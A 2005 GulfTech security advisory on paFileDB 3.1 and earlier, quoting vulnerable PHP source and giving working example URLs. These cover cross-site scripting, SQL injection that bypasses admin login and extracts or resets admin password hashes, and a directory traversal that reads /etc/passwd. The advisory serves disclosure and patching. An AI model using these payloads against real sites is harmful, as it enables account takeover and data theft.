##########################################################
# GulfTech Security Research           June 14th, 2005
##########################################################
# Vendor  : php Arena
# URL     : http://www.phparena.net/pafiledb.php
# Version : paFileDB 3.1 && Earlier
# Risk    : Multiple Vulnerabilities
##########################################################



Description:
paFileDB is a popular open source web application offered by
php Arena. paFileDB allows webmasters to open up an interactive
file repository on their website. There are a number of
vulnerabilities in paFileDB that may allow for an attacker to
include arbitrary files, retrieve sensitive user and/or database
information, and completely bypass admin, and team member
authentication. Users should upgrade immediately.



Cross Site Scripting:
There are a number of cross site scripting issues in the paFileDB
software. Majority of these cross site scripting issues stem from
concatenated variables never being initialized.

http://pafiledb/pafiledb.php?action=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
script%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

These vulnerabilities can be used to render hostile code in the
context of the victims browser, and in turn disclose sensitive
information to an attacker.



SQL Injection:
There are a number of SQL Injection vulnerabilities in paFileDB,
but it should be noted that to exploit these issues magic quotes
gpc must be off. Also, magic quotes off seems to be the default
php.ini settings now so I do consider these issues fairly high
risk. The most serious of the SQL Injection issues lies in the
administrative login.

if ($login == "do")
{
    $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin 
WHERE admin_username = '$formname'", 1);
    $formpw = md5($formpass);
    if ($formpw == $admin[admin_password])
    {
        $adminip = getenv ("REMOTE_ADDR");
        $ip = md5($adminip);
        $user = $formname;
        $pass = $formpw;

        if ($authmethod == "cookies")
        {
            $cookiedata = "$ip|$formname|$formpw";
            setcookie("pafiledbcookie", $cookiedata);
        }

        header("Location: admin.php");
}


The variable $formname is taken directly from the submitted login form
and executed in the query, so if magic quotes gpc an attacker can
use UNION SELECT to bypass admin authentication!

http://pafiledb/pafiledb.php?action=admin&login=do&formname=-99'%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',
%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do

The query above uses a UNION SELECT to get the admin username, id, email etc
but we specify the password hash as the md5 encrypted value of the $formpass
variable. This same issue applies to the team login, and also the auth.php
scripts in the /teams/ and /admin/ directory.

There is also an SQL Injection vulnerability that will allow for team 
members to
gain the administrative password hash and escalate their privileges to 
admin.

http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

Last but not least there is a SQL Injection vulnerability in search.php
because the $string variable is never sanitized.

There is one SQL Injection issue in paFileDB that does not require magic_
quotes_gpc to be disabled. This particular issue will let a team member
run any sql command that they like, including making themselves an admin.

http://pafiledb/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*

The above url would successfully set the admin password to 1337 if ran by
a logged in team member or admin. This vulnerability exists because the
$query variable is never declared before being concatenated so we can in
turn hijack the $query variable and run any sql commands we like.



Local File Include Vulnerability:
paFileDB is vulnerable to a local file inclusion vulnerability that may
allow for an attacker to execute arbitrary local scripts, or read/access
arbitrary files on the webserver. Let's look at pafiledb.php

if ($login == "do") { include "./includes/$action/login.php"; exit; }
if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }
if ($tm == "logout") { include "./includes/team/logout.php"; exit; }

The $action variable is never sanitized and vulnerable to directory
traversal sequences.

http://pafiledb/pafiledb.php?action=../../../../etc/passwd%00&login=do

This vulnerability exists on all paFileDB configurations, as all GPC
is extracted to global variables.



Solution:
A new version of paFileDB has been released, so upgrading is advised.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00082-06142005



Credits:
James Bercegay of the GulfTech Security Research Team